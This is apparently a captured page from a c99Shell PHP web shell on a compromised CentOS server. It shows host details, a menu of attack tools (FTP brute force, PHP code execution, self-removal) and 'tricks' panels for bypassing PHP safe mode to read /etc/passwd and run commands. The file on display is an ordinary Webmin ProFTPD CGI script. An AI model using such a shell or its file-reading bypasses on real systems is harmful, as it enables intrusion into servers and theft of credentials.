110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/proftpd/ drwxr-xr-x Free 50.93 GB of 127.8 GB (39.85%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# edit_dserv.cgi
# Edit <Directory> section details

require './proftpd-lib.pl';
&ReadParse();
if ($in{'global'}) {
    $conf = &get_config();
    $conf = &get_or_create_global($conf);
    }
else {
    ($conf, $v) = &get_virtual_config($in{'virt'});
    }
if ($in{'anon'}) {
    $anon = &find_directive_struct("Anonymous", $conf);
    $conf = $anon->{'members'};
    }
$d = $conf->[$in{'idx'}];
$dn = $d->{'words'}->[0];
$dconf = $d->{'members'};
$desc = $in{'global'} ? &text('dir_header5', $dn) :
    $in{'anon'} ? &text('dir_header4', $dn) :
    $in{'virt'} ?  &text('dir_header1', $dn, $v->{'words'}->[0]) :
    &text('dir_header2', $dn);
&ui_print_header($desc, $text{'dserv_title'}, "",
    undef, undef, undef, undef, &restart_button());

print "<form action=save_dserv.cgi>\n";
print "<input type=hidden name=virt value='$in{'virt'}'>\n";
print "<input type=hidden name=idx value='$in{'idx'}'>\n";
print "<input type=hidden name=anon value='$in{'anon'}'>\n";
print "<input type=hidden name=global value='$in{'global'}'>\n";
print "<table border>\n";
print "<tr $tb> <td><b>$text{'dserv_title'}</b></td> </tr>\n";
print "<tr $cb> <td><table>\n";

print "<tr> <td><b>$text{'dserv_dir'}</b></td>\n";
printf "<td><input name=dir size=40 value='%s'> %s</td> </tr>\n",
    $d->{'value'}, &file_chooser_button("dir", 1);

print "<tr> <td colspan=2 align=right>\n";
print "<input type=submit value=\"$text{'save'}\">\n";
print "<input type=submit name=delete value=\"$text{'dserv_delete'}\">\n";
print "</td> </tr>\n";

print "</table> </td></tr></table><p>\n";
print "</form>\n";

if ($in{'global'}) {
    &ui_print_footer("dir_index.cgi?global=$in{'global'}&idx=$in{'idx'}",
        $text{'dir_return'},
        "", $text{'index_return'});
    }
elsif ($in{'anon'}) {
    &ui_print_footer("dir_index.cgi?virt=$in{'virt'}&idx=$in{'idx'}&anon=$in{anon}",
        $text{'dir_return'},
        "anon_index.cgi?virt=$in{'virt'}", $text{'anon_return'},
        "virt_index.cgi?virt=$in{'virt'}", $text{'virt_return'},
        "", $text{'index_return'});
    }
else {
    &ui_print_footer("dir_index.cgi?virt=$in{'virt'}&idx=$in{'idx'}",
        $text{'dir_return'},
        "virt_index.cgi?virt=$in{'virt'}", $text{'virt_return'},
        "", $text{'index_return'});
    }

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: